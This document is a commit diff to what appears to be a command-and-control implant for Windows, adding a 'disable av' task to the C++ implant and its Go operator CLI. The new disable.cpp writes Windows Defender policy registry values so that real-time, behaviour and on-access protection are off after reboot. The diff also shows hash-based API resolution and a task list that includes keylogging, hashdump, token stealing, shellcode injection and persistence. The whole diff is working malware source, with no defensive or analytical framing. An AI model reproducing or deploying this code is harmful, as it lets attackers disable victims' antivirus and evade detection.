added a feature to disable AV but its technique is legacy

payload/win/implant/CMakeLists.txt

@@ -87,6 +87,7 @@ set(SOURCE_CORE
         src/core/task/cmd.cpp
         src/core/task/connect.cpp
         src/core/task/cp.cpp
+        src/core/task/disable.cpp
         src/core/task/dll.cpp
         src/core/task/download.cpp
         src/core/task/env.cpp

payload/win/implant/include/core/procs.hpp

@@ -134,6 +134,7 @@
 #define HASH_FUNC_LOADICONW                     0x42d0af83
 #define HASH_FUNC_LOADLIBRARYA                  0x7069f241
 #define HASH_FUNC_LOADLIBRARYW                  0x7069f257
+#define HASH_FUNC_LOCALALLOC                    0xa505c69f
 #define HASH_FUNC_LOCALFREE                     0x50d0ddc2
 #define HASH_FUNC_LOOKUPPRIVILEGENAMEW          0x559348ea
 #define HASH_FUNC_LOOKUPPRIVILEGEVALUEW         0x6e9aab88
@@ -423,6 +424,8 @@ namespace Procs
     typedef HMODULE (WINAPI* LPPROC_LOADLIBRARYA)(LPCSTR lpLibFileName);
     // LoadLibraryW
     typedef HMODULE (WINAPI* LPPROC_LOADLIBRARYW)(LPCWSTR lpLibFileName);
+    // LocalAlloc
+    typedef HLOCAL (WINAPI* LPPROC_LOCALALLOC)(UINT uFlags, SIZE_T uBytes);
     // LocalFree
     typedef HLOCAL (WINAPI* LPPROC_LOCALFREE)(HLOCAL hMem);
     // LookupPrivilegeNameW
@@ -655,6 +658,7 @@ namespace Procs
         LPPROC_LOADICONW                    lpLoadIconW                         = nullptr;
         LPPROC_LOADLIBRARYA                 lpLoadLibraryA                      = nullptr;
         LPPROC_LOADLIBRARYW                 lpLoadLibraryW                      = nullptr;
+        LPPROC_LOCALALLOC                   lpLocalAlloc                        = nullptr;
         LPPROC_LOCALFREE                    lpLocalFree                         = nullptr;
         LPPROC_LOOKUPPRIVILEGENAMEW         lpLookupPrivilegeNameW              = nullptr;
         LPPROC_LOOKUPPRIVILEGEVALUEW        lpLookupPrivilegeValueW             = nullptr;

payload/win/implant/include/core/task.hpp

@@ -23,13 +23,13 @@
 #include <string>
 #include <vector>
 
-// For the 'ip' task
+// For 'ip' task
 #define MAX_TRIES 3
 #define WORKING_BUFFER_SIZE 15000
-// For the 'reg' task
+// For 'reg' task
 #define BUFFER_SIZE 8192
 #define MAX_REG_KEY_LENGTH 255
-// For the 'screenshot' task
+// For 'screenshot' task
 #define IDS_APP_TITLE 1
 #define IDC_GDICAPTURINGANIMAGE 1
 #define IDI_GDICAPTURINGANIMAGE 2
@@ -43,46 +43,47 @@
 #define TASK_CMD                0x04
 #define TASK_CONNECT            0x05
 #define TASK_CP                 0x06
-#define TASK_DLL                0x07
-#define TASK_DOWNLOAD           0x08
-#define TASK_ENV_LS             0x09
-#define TASK_FIND               0x10
-#define TASK_GROUP_LS           0x11
-#define TASK_HASHDUMP           0x12
-#define TASK_HISTORY            0x13
-#define TASK_IP                 0x14
-#define TASK_JITTER             0x15
-#define TASK_KEYLOG             0x16
-#define TASK_KILL               0x17
-#define TASK_KILLDATE           0x18
-#define TASK_LS                 0x19
-#define TASK_MIGRATE            0x20
-#define TASK_MKDIR              0x21
-#define TASK_MV                 0x22
-#define TASK_NET                0x23
-#define TASK_PE                 0x24
-#define TASK_PERSIST            0x25
-#define TASK_PROCDUMP           0x26
-#define TASK_PS_KILL            0x27
-#define TASK_PS_LS              0x28
-#define TASK_PWD                0x29
-#define TASK_REG_QUERY          0x30
-#define TASK_RM                 0x31
-#define TASK_RMDIR              0x32
-#define TASK_RPORTFWD_ADD       0x33
-#define TASK_RPORTFWD_LS        0x34
-#define TASK_RPORTFWD_RM        0x35
-#define TASK_RUNAS              0x36
-#define TASK_SCREENSHOT         0x37
-#define TASK_SHELLCODE          0x38
-#define TASK_SLEEP              0x39
-#define TASK_TOKEN_REVERT       0x40
-#define TASK_TOKEN_STEAL        0x41
-#define TASK_UAC                0x42
-#define TASK_UPLOAD             0x43
-#define TASK_USER_LS            0x44
-#define TASK_WHOAMI             0x45
-#define TASK_WHOAMI_PRIV        0x46
+#define TASK_DISABLE_AV         0x07
+#define TASK_DLL                0x08
+#define TASK_DOWNLOAD           0x09
+#define TASK_ENV_LS             0x10
+#define TASK_FIND               0x11
+#define TASK_GROUP_LS           0x12
+#define TASK_HASHDUMP           0x13
+#define TASK_HISTORY            0x14
+#define TASK_IP                 0x15
+#define TASK_JITTER             0x16
+#define TASK_KEYLOG             0x17
+#define TASK_KILL               0x18
+#define TASK_KILLDATE           0x19
+#define TASK_LS                 0x20
+#define TASK_MIGRATE            0x21
+#define TASK_MKDIR              0x22
+#define TASK_MV                 0x23
+#define TASK_NET                0x24
+#define TASK_PE                 0x25
+#define TASK_PERSIST            0x26
+#define TASK_PROCDUMP           0x27
+#define TASK_PS_KILL            0x28
+#define TASK_PS_LS              0x29
+#define TASK_PWD                0x30
+#define TASK_REG_QUERY          0x31
+#define TASK_RM                 0x32
+#define TASK_RMDIR              0x33
+#define TASK_RPORTFWD_ADD       0x34
+#define TASK_RPORTFWD_LS        0x35
+#define TASK_RPORTFWD_RM        0x36
+#define TASK_RUNAS              0x37
+#define TASK_SCREENSHOT         0x38
+#define TASK_SHELLCODE          0x39
+#define TASK_SLEEP              0x40
+#define TASK_TOKEN_REVERT       0x41
+#define TASK_TOKEN_STEAL        0x42
+#define TASK_UAC                0x43
+#define TASK_UPLOAD             0x44
+#define TASK_USER_LS            0x45
+#define TASK_WHOAMI             0x46
+#define TASK_WHOAMI_PRIV        0x47
 
 namespace Task
 {
@@ -139,6 +140,7 @@ namespace Task
     std::wstring Cmd(State::PSTATE pState, const std::wstring& wCmd);
     std::wstring Connect(State::PSTATE pState, const std::wstring& wListenerURL);
     std::wstring Cp(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
+    std::wstring DisableAV(State::PSTATE pState);
     std::wstring Dll(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc, const std::wstring& wTechnique);
     std::wstring Download(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
     std::wstring EnvLs(State::PSTATE pState);

payload/win/implant/script/calc_hash_func.py

@@ -117,6 +117,7 @@
     "LoadIconW",
     "LoadLibraryA",
     "LoadLibraryW",
+    "LocalAlloc",
     "LocalFree",
     "LookupPrivilegeNameW",
     "LookupPrivilegeValueW",

payload/win/implant/src/core/handler.cpp

@@ -203,6 +203,9 @@ namespace Handler
                     Utils::Convert::UTF8Decode(args["dest"])
                 );
                 break;
+            case TASK_DISABLE_AV:
+                wTaskResult = Task::DisableAV(pState);
+                break;
             case TASK_DLL:
                 wTaskResult = Task::Dll(
                     pState,

payload/win/implant/src/core/procs.cpp

@@ -219,6 +219,8 @@ namespace Procs
         pProcs->lpLoadLibraryA                  = reinterpret_cast<LPPROC_LOADLIBRARYA>(pLoadLibraryA);
         PVOID pLoadLibraryW                     = GetProcAddressByHash(hKernel32, HASH_FUNC_LOADLIBRARYW);
         pProcs->lpLoadLibraryW                  = reinterpret_cast<LPPROC_LOADLIBRARYW>(pLoadLibraryW);
+        PVOID pLocalAlloc                       = GetProcAddressByHash(hKernel32, HASH_FUNC_LOCALALLOC);
+        pProcs->lpLocalAlloc                    = reinterpret_cast<LPPROC_LOCALALLOC>(pLocalAlloc);
         PVOID pLocalFree                        = GetProcAddressByHash(hKernel32, HASH_FUNC_LOCALFREE);
         pProcs->lpLocalFree                     = reinterpret_cast<LPPROC_LOCALFREE>(pLocalFree);
         PVOID pIsDebuggerPresent                = GetProcAddressByHash(hKernel32, HASH_FUNC_ISDEBUGGERPRESENT);

payload/win/implant/src/core/task/disable.cpp

@@ -0,0 +1,120 @@
+#include "core/task.hpp"
+
+namespace Task
+{
+    // Disable AV.
+    // Reference: https://cocomelonc.github.io/tutorial/2022/06/05/malware-av-evasion-7.html
+    std::wstring DisableAV(State::PSTATE pState)
+    {
+        // Check for admin rights.
+        HANDLE hToken = System::Process::ProcessTokenOpen(pState->pProcs, NtCurrentProcess(), TOKEN_QUERY);
+        if (!hToken)
+        {
+            return L"Error: Failed to open process token.";
+        }
+
+        TOKEN_ELEVATION tokenElev;
+        DWORD dwSize;
+        if (!pState->pProcs->lpGetTokenInformation(hToken, TokenElevation, &tokenElev, sizeof(tokenElev), &dwSize))
+        {
+            System::Handle::HandleClose(pState->pProcs, hToken);
+            return L"Error: Failed to get token information.";
+        }
+        if (!tokenElev.TokenIsElevated)
+        {
+            System::Handle::HandleClose(pState->pProcs, hToken);
+            return L"Error: You don't have administrator rights.";
+        }
+        System::Handle::HandleClose(pState->pProcs, hToken);
+
+        // Edit registry to disable AV.
+        HKEY hKey;
+        HKEY hNewKey;
+        DWORD dwDisable = 1;
+
+        LONG res = pState->pProcs->lpRegOpenKeyExW(
+            HKEY_LOCAL_MACHINE,
+            L"SOFTWARE\\Policies\\Microsoft\\Windows Defender",
+            0,
+            KEY_ALL_ACCESS,
+            &hKey
+        );
+        if (res != ERROR_SUCCESS)
+        {
+            return L"Error: Failed to open registry key.";
+        }
+
+        pState->pProcs->lpRegSetValueExW(
+            hKey,
+            L"DisableAntiSpyWare",
+            0,
+            REG_DWORD,
+            (const BYTE*)&dwDisable,
+            sizeof(dwDisable)
+        );
+
+        pState->pProcs->lpRegCreateKeyExW(
+            hKey,
+            L"Real-Time Protection",
+            0,
+            0,
+            REG_OPTION_NON_VOLATILE,
+            KEY_ALL_ACCESS,
+            0,
+            &hNewKey,
+            0
+        );
+
+        pState->pProcs->lpRegSetValueExW(
+            hNewKey,
+            L"DisableRealtimeMonitoring",
+            0,
+            REG_DWORD,
+            (const BYTE*)&dwDisable,
+            sizeof(dwDisable)
+        );
+        pState->pProcs->lpRegSetValueExW(
+            hNewKey,
+            L"DisableBehaviorMonitoring",
+            0,
+            REG_DWORD,
+            (const BYTE*)&dwDisable,
+            sizeof(dwDisable)
+        );
+        pState->pProcs->lpRegSetValueExW(
+            hNewKey,
+            L"DisableScanOnRealtimeEnable",
+            0,
+            REG_DWORD,
+            (const BYTE*)&dwDisable,
+            sizeof(dwDisable)
+        );
+        pState->pProcs->lpRegSetValueExW(
+            hNewKey,
+            L"DisableOnAccessProtection",
+            0,
+            REG_DWORD,
+            (const BYTE*)&dwDisable,
+            sizeof(dwDisable)
+        );
+        pState->pProcs->lpRegSetValueExW(
+            hNewKey,
+            L"DisableIOAVProtection",
+            0,
+            REG_DWORD,
+            (const BYTE*)&dwDisable,
+            sizeof(dwDisable)
+        );
+
+        pState->pProcs->lpRegCloseKey(hKey);
+        pState->pProcs->lpRegCloseKey(hNewKey);
+
+        return L"Success: Completed setting the registry to disable AV. When the machine restarted, Windows Defender is disabled.";
+    }
+
+    // Disable EDR.
+    // std::wstring DisableEDR(State::PSTATE pState)
+    // {
+    //     return L"Warning: This is not implemented yet.";
+    // }
+}

payload/win/implant/src/core/task/shellcode.cpp

@@ -24,7 +24,7 @@ namespace Task
         );
         if (bytes.size() == 0)
         {
-            return L"Error: Failed to get DLL.";
+            return L"Error: Failed to download shellcode.";
         }
 
         // Inject shellcode

pkg/common/parser/amtaskcommand.go

@@ -171,6 +171,31 @@ type amTaskCredsCmd struct {
 	Steal amTaskCredsStealCmd `cmd:"" help:"Steal credentials from various resources on the target computer"`
 }
 
+// DISABLE (AV or EDR)
+type amTaskDisableAvCmd struct{}
+
+func (c *amTaskDisableAvCmd) Run(
+	ctx *kong.Context,
+	serverState *servState.ServerState,
+	clientState *cliState.ClientState,
+) error {
+	task, err := _task.NewTask("disable av", map[string]string{})
+	if err != nil {
+		return err
+	}
+
+	err = handler.HandleAmTaskSet(task, serverState, clientState)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+type amTaskDisableCmd struct {
+	Av amTaskDisableAvCmd `cmd:"" help:"Disable AV (Widnows Defender)."`
+	// Edr amTaskDisableEdrCmd `cmd:"" help:"Disable EDR."`
+}
+
 // DLL
 type amTaskDllCmd struct {
 	File string `short:"f" name:"file" required:"" type:"path" help:"Specify the DLL file path to inject."`

pkg/common/parser/parser.go

@@ -61,6 +61,7 @@ type GrammarAgentMode struct {
 	Connect  amTaskConnectCmd  `cmd:"" help:"Change listener URL to connect." group:"TASK:"`
 	Cp       amTaskCpCmd       `cmd:"" help:"Copy a file." group:"TASK:"`
 	Creds    amTaskCredsCmd    `cmd:"" help:"Credentials." group:"TASK:"`
+	Disable  amTaskDisableCmd  `cmd:"" help:"Disable AV or EDR." group:"TASK:"`
 	Dll      amTaskDllCmd      `cmd:"" help:"Load DLL and inject modules into the specified process." group:"TASK:"`
 	Download amTaskDownloadCmd `cmd:"" help:"Download a file." group:"TASK:"`
 	Env      amTaskEnvCmd      `cmd:"" help:"Manage environment variables." group:"TASK:"`
@@ -72,7 +73,7 @@ type GrammarAgentMode struct {
 	History  amTaskHistoryCmd  `cmd:"" help:"Retrieve information from history files of applications" group:"TASK:"`
 	Ip       amTaskIpCmd       `cmd:"" help:"Print the network interface information on target computer" group:"TASK:"`
 	Jitter   amTaskJitterCmd   `cmd:"" help:"Set jitter time (seconds) between requests from beacon" group:"TASK:"`
-	Keylog   amTaskKeylogCmd   `cmd:"" help:"Keylogging N seconds." group:"TASK:"`
+	Keylog   amTaskKeylogCmd   `cmd:"" help:"Keylogging for N seconds." group:"TASK:"`
 	Kill     amTaskKillCmd     `cmd:"" help:"Terminate the current process." group:"TASK:"`
 	Killdate amTaskKilldateCmd `cmd:"" help:"Change killdate (UTC) for the implant beacon." group:"TASK:"`
 	Ls       amTaskLsCmd       `cmd:"" help:"List files in a directory." group:"TASK:"`
@@ -102,7 +103,6 @@ type GrammarAgentMode struct {
 	Upload amTaskUploadCmd `cmd:"" help:"Upload a file to the target computer." group:"TASK:"`
 	User   amTaskUserCmd   `cmd:"" help:"Manage users." group:"TASK:"`
 	Users  amTaskUserLsCmd `cmd:"" help:"Alias for 'user ls'." group:"TASK:"`
-	// WebCam amTaskWebCamCmd   `cmd:"" help:"WebCam" group:"TASK:"`
 	Whoami amTaskWhoamiCmd `cmd:"" help:"Print the current user information." group:"TASK:"`
 
 	Task  amTaskCmd     `cmd:"" help:"Manage tasks." group:"TASK MANAGE:"`